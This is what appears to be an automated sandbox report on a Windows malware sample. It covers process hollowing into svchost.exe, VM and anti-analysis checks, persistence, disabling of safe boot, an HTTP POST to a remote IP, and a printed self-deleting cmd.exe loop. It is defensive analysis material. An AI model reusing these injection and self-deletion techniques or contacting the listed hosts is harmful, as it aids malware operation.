JBX Analysis Report

Loading ...

General Information

Analysis ID:28014
Start time:11:27:22
Start date:11/01/2013
Overall analysis duration:0h 3m 30s
Sample file name:1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Cookbook file name:default.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
SCAE enabled:true
SCAE success:true, ratio: 100%

Classification / Threat Score

Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

Matching Signatures

Behavior Signatures
Creates temporary files
Queries a list of all running processes
Reads ini files
Spawns processes
Urls found in memory or binary data
Binary may include packed or crypted data
Creates files inside the system directory
Creates guard pages, often used to prevent reverse engineering and debugging
Downloads files from webservers via HTTP
Drops PE files
May tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
PE sections with suspicious entropy found
Performs DNS lookups
Posts data to webserver
AV process strings found (often used to terminate AV products)
Checks the online ip address of the machinewww.ip-address.org
Contains capabilities to detect virtual machines
Creates an autostart registry key
Deletes itself after installation
Deletes keys which are related to windows safe boot (disables safe mode boot)
Found dropped PE file which has not been started or loadedC:\WINDOWS\system32\1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries disk information (often used to detect virtual machines)

Code Signatures
Contains functionality to create a new security descriptor
Contains functionality to create pipes a new desktop
Contains functionality to download additional files from the internet
Contains functionality to enum processes or threads
Contains functionality to query local / system time
Contains functionality to query windows version
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to hide windows to a different desktop

Startup

  • system is xp
  • cleanup

Created / dropped Files

File PathMD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp129C.tmp.gifF560BF7BA58628B6B7D89CEEC97FBB2F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp3092.tmp.gif6D1C9B8721FA24390A361420B868A6D5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp6F8C.tmp.jpgAF8F571D37E66513D01510F4DBF73571
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7239.tmp.jpg7FB84A91F0672B7C7F5806CC8F614DC2
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7708.tmp.jpg85E7BA0D1A93F36CDB1BCB4C5CC75BE2
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7B2C.tmp.gif7939A167B9497C21906431107F23CB5C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7DE6.tmp.jpg85FCF87FF2B2C025854E1AE4FCCA6862
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpA06.tmp.gifEFEE4DA97365CC42AFC02428952171BC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpE973.tmp.gifE33F4B5E5E491920BD64FE0BFA46F7B5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpF20.tmp.gifDE463C61019A555994FA530BF47028CA
C:\WINDOWS\system32\1-237f8ffc0c24191c5bb7bd9099802ee4.exe237F8FFC0C24191C5BB7BD9099802EE4
\ROUTER9EE29DE553FC6640B99B92E3E67F93CA

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
www.ip-address.org192.162.136.86trueunknownunknown

Contacted IPs

IPCountryPingableOpen Ports
192.162.136.86unknowntrue21 22 80 443
78.46.86.137GERMANYtrue22 80
195.186.1.121SWITZERLANDfalse
195.186.4.121SWITZERLANDfalse

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:1-237f8ffc0c24191c5bb7bd9099802ee4.exe
File size:127752
MD5:237f8ffc0c24191c5bb7bd9099802ee4
SHA1:0264fdbb9e05b07a689aaf0ee7b60209eca15b6b
SHA256:8c4991ddd46b7adee31bacb30d9efe572c426d79bf5f3e8edffed65e55cd0e7a
SHA512:cbec7372cfddc87ace452bdf06cf93555908c31aca768820025ab6dd561230aaa5494182cdf0665c97b20b205220e00d129329b43a22eaf174d5ca56dcfa821e

Static PE Info

General
Entrypoint:0x401840
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:0x50ED518F [Wed Jan 9 11:16:31 2013 UTC]
TLS Callbacks:
Imports
DLLImport
KERNEL32.dllReadFile, ExitProcess, VirtualAllocEx, GetWindowsDirectoryA, lstrcatA, CreateFileA
USER32.dllRegisterClassExA
GDI32.dllGetStockObject
ADVAPI32.dllRegOpenKeyExW
WINMM.dllPlaySoundA
Sections
NameVirtual AddressVirtual SizeRaw SizeEntropy
.text0x10000xda80xe005.29306544227
.rdata0x20000x1a6350x1a8007.94582373968
.data0x1d0000x2b80x4003.21167866906
.reloc0x1e0000x740x2001.83713353723

String Analysis

URLs
String valueSource
http://ns.adobe.com/xap/1.0/tmp3092.tmp.gif.dr
http://ns.adobe.com/xap/1.0/mm/tmp3092.tmp.gif.dr
http://ns.adobe.com/xap/1.0/stype/resourceref#tmp3092.tmp.gif.dr
http://www.w3.org/1999/02/22-rdf-syntax-ns#tmp3092.tmp.gif.dr
VM Artifacts
String valueSource
VMWAREsvchost.exe
AV process names
String valueSource
wireshark.exe1-237f8ffc0c24191c5bb7bd9099802ee4.exe

Network Behavior

TCP Packets
TimestampSource PortDest PortSource IPDest IP
Jan 11, 2013 11:28:17.293838024 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:18.294051886 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:19.296561003 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:21.293451071 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:21.294487000 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:25.293307066 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:25.294342995 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:29.502634048 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.686904907 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723196983 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.723232985 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723267078 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723294020 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.723347902 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.742233992 CET103180192.168.0.10192.162.136.86
Jan 11, 2013 11:28:29.742260933 CET801031192.162.136.86192.168.0.10
Jan 11, 2013 11:28:29.742600918 CET103180192.168.0.10192.162.136.86
Jan 11, 2013 11:28:29.746618986 CET103180192.168.0.10192.162.136.86
Jan 11, 2013 11:28:29.746632099 CET801031192.162.136.86192.168.0.10
Jan 11, 2013 11:28:52.918301105 CET801031192.162.136.86192.168.0.10
Jan 11, 2013 11:28:52.954636097 CET801031192.162.136.86192.168.0.10
Jan 11, 2013 11:28:52.955142975 CET103180192.168.0.10192.162.136.86
Jan 11, 2013 11:28:52.956044912 CET103180192.168.0.10192.162.136.86
Jan 11, 2013 11:28:52.956058979 CET801031192.162.136.86192.168.0.10
Jan 11, 2013 11:28:54.032778978 CET103280192.168.0.1078.46.86.137
Jan 11, 2013 11:28:54.032807112 CET80103278.46.86.137192.168.0.10
Jan 11, 2013 11:28:54.032972097 CET103280192.168.0.1078.46.86.137
Jan 11, 2013 11:28:54.033302069 CET103280192.168.0.1078.46.86.137
Jan 11, 2013 11:28:54.033313036 CET80103278.46.86.137192.168.0.10
Jan 11, 2013 11:28:55.857000113 CET80103278.46.86.137192.168.0.10
Jan 11, 2013 11:28:55.994759083 CET80103278.46.86.137192.168.0.10
Jan 11, 2013 11:28:55.995234013 CET103280192.168.0.1078.46.86.137
Jan 11, 2013 11:28:55.996102095 CET103280192.168.0.1078.46.86.137
Jan 11, 2013 11:28:55.996117115 CET80103278.46.86.137192.168.0.10
UDP Packets
TimestampSource PortDest PortSource IPDest IP
Jan 11, 2013 11:28:17.293838024 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:18.294051886 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:19.296561003 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:21.293451071 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:21.294487000 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:25.293307066 CET6040153192.168.0.10195.186.1.121
Jan 11, 2013 11:28:25.294342995 CET6040153192.168.0.10195.186.4.121
Jan 11, 2013 11:28:29.502634048 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.686904907 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723196983 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.723232985 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723267078 CET5360401195.186.1.121192.168.0.10
Jan 11, 2013 11:28:29.723294020 CET5360401195.186.4.121192.168.0.10
Jan 11, 2013 11:28:29.723347902 CET5360401195.186.1.121192.168.0.10
ICMP Packets
TimestampSource IPDest IPChecksumCodeType
Jan 11, 2013 11:28:29.687268972 CET192.168.0.10195.186.1.1218330(Port unreachable)Destination Unreachable
Jan 11, 2013 11:28:29.723541975 CET192.168.0.10195.186.4.1218630(Port unreachable)Destination Unreachable
Jan 11, 2013 11:28:29.723622084 CET192.168.0.10195.186.1.1218330(Port unreachable)Destination Unreachable
Jan 11, 2013 11:28:29.723700047 CET192.168.0.10195.186.1.1218330(Port unreachable)Destination Unreachable
Jan 11, 2013 11:28:29.723776102 CET192.168.0.10195.186.4.1218630(Port unreachable)Destination Unreachable
Jan 11, 2013 11:28:29.723985910 CET192.168.0.10195.186.1.1218330(Port unreachable)Destination Unreachable
DNS Queries
TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jan 11, 2013 11:28:17.293838024 CET192.168.0.10195.186.1.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:18.294051886 CET192.168.0.10195.186.4.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:19.296561003 CET192.168.0.10195.186.1.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:21.293451071 CET192.168.0.10195.186.1.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:21.294487000 CET192.168.0.10195.186.4.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:25.293307066 CET192.168.0.10195.186.1.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
Jan 11, 2013 11:28:25.294342995 CET192.168.0.10195.186.4.1210x3ce8Standard query (0)www.ip-address.orgA (IP address)IN (0x0001)
DNS Answers
TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jan 11, 2013 11:28:29.502634048 CET195.186.4.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.686904907 CET195.186.1.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.723196983 CET195.186.4.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.723232985 CET195.186.1.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.723267078 CET195.186.1.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.723294020 CET195.186.4.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
Jan 11, 2013 11:28:29.723347902 CET195.186.1.121192.168.0.100x3ce8No error (0)www.ip-address.org192.162.136.86A (IP address)IN (0x0001)
HTTP Request Dependency Graph
  • www.ip-address.org
  • 78.46.86.137
HTTP Packets
TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Jan 11, 2013 11:28:29.746618986 CET103180192.168.0.10192.162.136.86GET /ip-checker.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: www.ip-address.org
2
Jan 11, 2013 11:28:52.918301105 CET801031192.162.136.86192.168.0.10HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 10:28:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 735
Vary: User-Agent
2
Jan 11, 2013 11:28:54.033302069 CET103280192.168.0.1078.46.86.137POST /index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=213218
Host: 78.46.86.137
Connection: close
Cache-Control: no-cache
Content-Length: 354
4
Jan 11, 2013 11:28:55.857000113 CET80103278.46.86.137192.168.0.10HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Jan 2013 10:28:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 60
4

Code Manipulation Behavior

System Behavior

Analysis Process: 1-237f8ffc0c24191c5bb7bd9099802ee4.exe PID: 1324 Parent PID: 1556

General
Start time:09:49:56
Start date:24/01/2012
Path:C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:127752 bytes
MD5 hash:237F8FFC0C24191C5BB7BD9099802EE4

Chronological Activities

Analysis Process: svchost.exe PID: 576 Parent PID: 1324

General
Start time:09:49:57
Start date:24/01/2012
Path:C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe
Imagebase:0x77f60000
File size:14336 bytes
MD5 hash:27C6D03BCDB8CFEB96B716F3D8BE3E18

Chronological Activities

Analysis Process: cmd.exe PID: 424 Parent PID: 576

General
Start time:09:50:34
Start date:24/01/2012
Path:C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\cmd.exe /q /c for /l %i in (1 1 4000000000) do if not exist C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe (exit) else (del /f C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe )
Imagebase:0x4ad00000
File size:389120 bytes
MD5 hash:6D778E0F95447E6546553EEEA709D03C

Chronological Activities

Disassembly

Code Analysis

< >

    Analysis Process: 1-237f8ffc0c24191c5bb7bd9099802ee4.exe PID: 1324 Parent PID: 1556

    Executed Functions
    Function 00401530, Relevance: 63.5, APIs: 24, Strings: 24, Instructions: 297
    APIs
    • memset.NTDLL(?,00000000), ref: 004015A7
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004015D3
    • lstrcpy.KERNEL32(?,svchost.exe), ref: 004015F9
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00401619
    • RtlGetLastWin32Error.NTDLL ref: 00401623
    • memset.NTDLL(?,00000000), ref: 0040164C
    • GetThreadContext.KERNEL32(?,?), ref: 00401669
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000), ref: 0040168C
    • CreateFileMappingA.KERNEL32(000000FF), ref: 0040169F
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000), ref: 004016B7
    • RtlGetLastWin32Error.NTDLL ref: 004016C4
    • NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 004016F7
    • NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 00401721
    • WriteProcessMemory.KERNEL32(?,00402288,?,?,00000000), ref: 00401745
    • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,00000001,00000000,00000040,?,000F001F,00000000,00000000), ref: 00401793
    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00401808
    • SetThreadContext.KERNEL32(?,?), ref: 00401829
    • ResumeThread.KERNEL32(?), ref: 00401837
    • RtlGetLastWin32Error.NTDLL ref: 00401842
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00401852
    • CloseHandle.KERNEL32(?), ref: 00401862
    • TerminateProcess.KERNEL32(?,00000000), ref: 00401878
    • CloseHandle.KERNEL32(?), ref: 00401882
    • CloseHandle.KERNEL32(?), ref: 00401888
    Strings
    Function 004013C0, Relevance: 27.6, APIs: 11, Strings: 11, Instructions: 111
    APIs
    • _alloca_probe.NTDLL ref: 004013C5
    • _snprintf.NTDLL ref: 004013EC
    • RtlGetLastWin32Error.NTDLL ref: 004013F8
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00401419
    • RtlGetLastWin32Error.NTDLL ref: 00401426
    • memset.NTDLL(?,00000000), ref: 00401462
    • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0040148B
    • RtlGetLastWin32Error.NTDLL ref: 00401495
    • CloseHandle.KERNEL32 ref: 0040149E
      • Part of subcall function 00401270: tolower.NTDLL ref: 004012A2
      • Part of subcall function 00401270: isspace.NTDLL ref: 004012AD
      • Part of subcall function 00401270: isprint.NTDLL ref: 004012F9
      • Part of subcall function 00401270: isprint.NTDLL ref: 00401323
      • Part of subcall function 00401270: isspace.NTDLL ref: 00401375
    • CloseHandle.KERNEL32 ref: 004014E1
    • CloseHandle.KERNEL32 ref: 00401507
    Strings
    Function 00401110, Relevance: 18.3, APIs: 6, Strings: 6, Instructions: 82
    APIs
    • GetProcessHeap.KERNEL32 ref: 00401139
    • RtlAllocateHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 00401140
      • Part of subcall function 00401E30: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401E5D
      • Part of subcall function 00401E30: VirtualAlloc.KERNEL32(00000000,0002CE82,00001000,00000004), ref: 00401E6D
      • Part of subcall function 00401E30: memset.NTDLL(?,00000000), ref: 00401E75
      • Part of subcall function 00401E30: RtlDecompressBuffer.NTDLL(00000102,?,0002CE82,?,00016741,?), ref: 00401E9F
      • Part of subcall function 00401E30: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401EE4
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011B5
      • Part of subcall function 00401530: memset.NTDLL(?,00000000), ref: 004015A7
      • Part of subcall function 00401530: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004015D3
      • Part of subcall function 00401530: lstrcpy.KERNEL32(?,svchost.exe), ref: 004015F9
      • Part of subcall function 00401530: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00401619
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 00401623
      • Part of subcall function 00401530: memset.NTDLL(?,00000000), ref: 0040164C
      • Part of subcall function 00401530: GetThreadContext.KERNEL32(?,?), ref: 00401669
      • Part of subcall function 00401530: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000), ref: 0040168C
      • Part of subcall function 00401530: CreateFileMappingA.KERNEL32(000000FF), ref: 0040169F
      • Part of subcall function 00401530: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000), ref: 004016B7
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 004016C4
      • Part of subcall function 00401530: NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 004016F7
      • Part of subcall function 00401530: NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 00401721
      • Part of subcall function 00401530: WriteProcessMemory.KERNEL32(?,00402288,?,?,00000000), ref: 00401745
      • Part of subcall function 00401530: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,00000001,00000000,00000040,?,000F001F,00000000,00000000), ref: 00401793
      • Part of subcall function 00401530: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00401808
      • Part of subcall function 00401530: SetThreadContext.KERNEL32(?,?), ref: 00401829
      • Part of subcall function 00401530: ResumeThread.KERNEL32(?), ref: 00401837
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 00401842
      • Part of subcall function 00401530: UnmapViewOfFile.KERNEL32(00000000), ref: 00401852
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401862
      • Part of subcall function 00401530: TerminateProcess.KERNEL32(?,00000000), ref: 00401878
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401882
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401888
    • GetProcessHeap.KERNEL32 ref: 004011D5
    • RtlFreeHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 004011DC
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004011EE
    Strings
    Function 00401D50, Relevance: 16.0, APIs: 6, Strings: 6, Instructions: 59
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D5B
    • memset.NTDLL(?,00000000), ref: 00401D7E
    • Process32FirstW.KERNEL32(?,?), ref: 00401D96
    • lstrcmpiW.KERNEL32(?,00404000), ref: 00401DBC
    • Process32NextW.KERNEL32(?,?), ref: 00401DD4
    • CloseHandle.KERNEL32 ref: 00401DE0
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401D9F
    Function 00401B70, Relevance: 24.5, APIs: 1, Strings: 1, Instructions: 94
    APIs
    • CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 00401C92
    Strings
    Function 00401000, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 42
    APIs
    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040100C
    • GetProcAddress.KERNEL32(?,RtlCompressBuffer), ref: 00401020
    • GetProcAddress.KERNEL32(?,RtlDecompressBuffer), ref: 0040102D
    • GetProcAddress.KERNEL32(?,RtlGetCompressionWorkSpaceSize), ref: 0040103A
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401B9D
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401BA5
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401BAF
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401BBA
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BC6
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BE0
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BFA
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C14
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C2E
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C48
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C65
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C82
      • Part of subcall function 00401B40: GetModuleHandleA.KERNEL32(00000000), ref: 00401CBF
      • Part of subcall function 00401B40: GetModuleFileNameA.KERNEL32 ref: 00401CC6
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401CD8
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401CE3
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401CF2
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401D0B
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401D24
      • Part of subcall function 00401080: GetModuleHandleA.KERNEL32(00000000), ref: 00401092
      • Part of subcall function 00401080: GetModuleFileNameA.KERNEL32 ref: 00401099
      • Part of subcall function 00401080: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010A8
      • Part of subcall function 00401080: _snprintf.NTDLL ref: 004010C7
      • Part of subcall function 00401080: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 004010DE
      • Part of subcall function 00401080: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 004010F9
    • ExitProcess.KERNEL32(00000661,?,RtlDecompressBuffer,?,RtlCompressBuffer), ref: 00401068
      • Part of subcall function 00401110: GetProcessHeap.KERNEL32 ref: 00401139
      • Part of subcall function 00401110: RtlAllocateHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 00401140
      • Part of subcall function 00401110: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011B5
      • Part of subcall function 00401110: GetProcessHeap.KERNEL32 ref: 004011D5
      • Part of subcall function 00401110: RtlFreeHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 004011DC
      • Part of subcall function 00401110: VirtualFree.KERNEL32(?,00000000,00008000), ref: 004011EE
    • ExitProcess.KERNEL32(?,?,RtlDecompressBuffer,?,RtlCompressBuffer), ref: 00401074
      • Part of subcall function 00401D50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D5B
      • Part of subcall function 00401D50: memset.NTDLL(?,00000000), ref: 00401D7E
      • Part of subcall function 00401D50: Process32FirstW.KERNEL32(?,?), ref: 00401D96
      • Part of subcall function 00401D50: lstrcmpiW.KERNEL32(?,00404000), ref: 00401DBC
      • Part of subcall function 00401D50: Process32NextW.KERNEL32(?,?), ref: 00401DD4
      • Part of subcall function 00401D50: CloseHandle.KERNEL32 ref: 00401DE0
      • Part of subcall function 00401E00: GetModuleHandleA.KERNEL32(00404004), ref: 00401E17
    Strings
    • ntdll.dll, xrefs: 00401007
    • RtlCompressBuffer, xrefs: 0040101A
    • RtlDecompressBuffer, xrefs: 00401022
    • RtlGetCompressionWorkSpaceSize, xrefs: 0040102F
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs:
    • ComSpec, xrefs:
    Function 00401A90, Relevance: 16.2, APIs: 5, Strings: 5, Instructions: 50
    APIs
    • RegCreateKeyExA.ADVAPI32 ref: 00401AC4
    • RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00401B02
    • RegCloseKey.ADVAPI32 ref: 00401B0C
    • CharUpperBuffA.USER32(?,?), ref: 00401B1C
    • strstr.NTDLL(?), ref: 00401B2C
    Strings
    Function 00401E30, Relevance: 12.3, APIs: 5, Strings: 5, Instructions: 73
    APIs
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401E5D
    • VirtualAlloc.KERNEL32(00000000,0002CE82,00001000,00000004), ref: 00401E6D
    • memset.NTDLL(?,00000000), ref: 00401E75
    • RtlDecompressBuffer.NTDLL(00000102,?,0002CE82,?,00016741,?), ref: 00401E9F
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401EE4
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401E40
    Function 00919B20, Relevance: 10.9, APIs: 6, Instructions: 197
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919B5F
      • Part of subcall function 00919810: LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00919862
      • Part of subcall function 00919810: GetProcAddress.KERNEL32(?), ref: 009198E6
      • Part of subcall function 00919810: GetProcAddress.KERNEL32(?), ref: 00919902
    • UnmapViewOfFile.KERNEL32(00400000), ref: 00919C11
    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00919C32
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C4C
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C6D
    • VirtualProtect.KERNEL32(00000000,00000006,00000040,?), ref: 00919D89
    Function 00919810, Relevance: 5.5, APIs: 3, Instructions: 104
    APIs
    • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00919862
    • GetProcAddress.KERNEL32(?), ref: 009198E6
    • GetProcAddress.KERNEL32(?), ref: 00919902
    Function 004011A0, Relevance: 2.3, APIs: 1, Instructions: 11
    APIs
    Function 00919DB0, Relevance: 1.7, APIs: 1, Instructions: 10
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919DC0
    Non-executed Functions
    Function 004019F0, Relevance: 3.7, Strings: 0, Instructions: 38
    Strings
    Function 00401B40, Relevance: 58.4, APIs: 19, Strings: 19, Instructions: 155
    APIs
      • Part of subcall function 00401A90: RegCreateKeyExA.ADVAPI32 ref: 00401AC4
      • Part of subcall function 00401A90: RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00401B02
      • Part of subcall function 00401A90: RegCloseKey.ADVAPI32 ref: 00401B0C
      • Part of subcall function 00401A90: CharUpperBuffA.USER32(?,?), ref: 00401B1C
      • Part of subcall function 00401A90: strstr.NTDLL(?), ref: 00401B2C
      • Part of subcall function 004013C0: _alloca_probe.NTDLL ref: 004013C5
      • Part of subcall function 004013C0: _snprintf.NTDLL ref: 004013EC
      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 004013F8
      • Part of subcall function 004013C0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00401419
